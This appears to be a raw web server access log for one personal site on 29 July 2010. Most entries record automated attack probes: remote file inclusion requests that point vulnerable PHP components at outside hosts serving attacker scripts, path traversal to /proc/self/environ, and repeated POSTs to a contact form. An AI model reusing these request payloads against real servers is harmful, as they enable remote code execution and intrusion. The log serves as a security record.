74.55.96.234 - - [29/Jul/2010:10:49:50 -0700] "GET /logs/access_100719.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:51:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:51:53 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:51:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:52:19 -0700] "GET /logs/access_100720.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:52:20 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:52:20 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:53:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:53:20 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
66.7.206.104 - - [29/Jul/2010:10:53:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:10:54:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:55:30 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:55:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:55:30 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:10:55:40 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
67.195.115.152 - - [29/Jul/2010:10:59:02 -0700] "GET /breakingnews/ HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:10:59:27 -0700] "GET /logs/access_100715.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:00:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:00:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
83.60.200.141 - - [29/Jul/2010:11:00:07 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 65526 "-" "intraVnews/1.12 (http://www.intravnews.com/)" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:11:01:18 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:11:01:18 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:11:01:20 -0700] "GET /logs/access_100719.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.195.115.152 - - [29/Jul/2010:11:01:24 -0700] "GET /breakingnews/?S=A HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonyafatah.com"
67.195.115.152 - - [29/Jul/2010:11:01:45 -0700] "GET /breakingnews/images/ HTTP/1.0" 200 549 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:02:16 -0700] "GET /logs/access_100720.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:02:17 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:02:17 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
217.71.227.229 - - [29/Jul/2010:11:02:24 -0700] "GET /logs/access_100712.log//bbs//download.php?board_skin_path=http://clicalbum.com/traffic/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
217.71.227.229 - - [29/Jul/2010:11:02:25 -0700] "GET /bbs//download.php?board_skin_path=http://clicalbum.com/traffic/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
217.71.227.229 - - [29/Jul/2010:11:02:25 -0700] "GET /logs//bbs//download.php?board_skin_path=http://clicalbum.com/traffic/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
217.71.227.229 - - [29/Jul/2010:11:04:22 -0700] "GET /logs/access_100503.log//bbs//download.php?board_skin_path=http://clicalbum.com/traffic/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
67.195.115.152 - - [29/Jul/2010:11:05:06 -0700] "GET /breakingnews/?M=A HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:07:01 -0700] "GET /logs/access_100721.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
218.234.23.94 - - [29/Jul/2010:11:08:16 -0700] "GET /logs/access_100719.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mln.mlc.edu.tw/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
218.234.23.94 - - [29/Jul/2010:11:08:16 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mln.mlc.edu.tw/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
218.234.23.94 - - [29/Jul/2010:11:08:16 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mln.mlc.edu.tw/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:46 -0700] "GET /logs/access_100717.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:46 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:46 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:50 -0700] "GET /logs/access_100717.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:50 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
64.34.172.171 - - [29/Jul/2010:11:08:50 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
87.229.45.28 - - [29/Jul/2010:11:09:10 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.229.45.28 - - [29/Jul/2010:11:09:10 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.229.45.28 - - [29/Jul/2010:11:09:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:40 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:51 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:11:15:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
113.30.66.24 - - [29/Jul/2010:11:16:25 -0700] "GET /errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
113.30.66.24 - - [29/Jul/2010:11:16:25 -0700] "GET /logs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
113.30.66.24 - - [29/Jul/2010:11:16:25 -0700] "GET /logs/access_100716.log/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:25 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:43 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:16:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:11:18:25 -0700] "GET /logs/access_100716.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:11:18:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:11:18:26 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:11:19:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:11:19:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:11:19:24 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
218.234.23.94 - - [29/Jul/2010:11:19:45 -0700] "GET /logs/access_100719.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mln.mlc.edu.tw/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:11:20:30 -0700] "GET /logs/access_100728.log HTTP/1.0" 200 1256068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
113.30.66.24 - - [29/Jul/2010:11:20:31 -0700] "GET /logs/access_100719.log%20%20/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:42 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:56 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
87.255.1.130 - - [29/Jul/2010:11:20:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:22:26 -0700] "GET /logs/access_100628.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:22:26 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
91.64.151.21 - - [29/Jul/2010:11:22:27 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:11:22:35 -0700] "GET /logs/access_100628.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:11:22:36 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:11:22:36 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
67.195.115.152 - - [29/Jul/2010:11:23:39 -0700] "GET /breakingnews/?D=A HTTP/1.0" 200 657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:23:47 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:23:47 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:23:47 -0700] "GET /logs/access_100719.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:24:53 -0700] "GET /logs/access_100721.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:11:25:19 -0700] "GET /logs/access_100426.log//?_zb_path=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:11:25:20 -0700] "GET /?_zb_path=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 200 2309 "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:11:25:20 -0700] "GET /logs//?_zb_path=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:11:25:48 -0700] "GET /logs/access_100428.log//?_zb_path=http://jy-lib.or.kr/bbs//skin/zero_vote/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:26:55 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:26:56 -0700] "GET /logs/access_100719.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:26:58 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:27:05 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:27:05 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:27:05 -0700] "GET /logs/access_100719.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:11:27:33 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:11:27:33 -0700] "GET /blog/index.php/2007/12/14/tangled-tale-from-pakistani-prison/trackback/ HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:11:27:37 -0700] "GET /blog/index.php/2007/12/14/tangled-tale-from-pakistani-prison/ HTTP/1.0" 200 12187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:28:52 -0700] "GET /logs/access_100721.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:29:10 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:29:10 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:29:23 -0700] "GET /logs/access_100719.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
41.78.28.104 - - [29/Jul/2010:11:30:37 -0700] "GET /logs/access_100721.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
194.158.206.224 - - [29/Jul/2010:11:31:15 -0700] "GET /logs/access_100721.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kesawan.fileave.com/irc/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:11:31:49 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
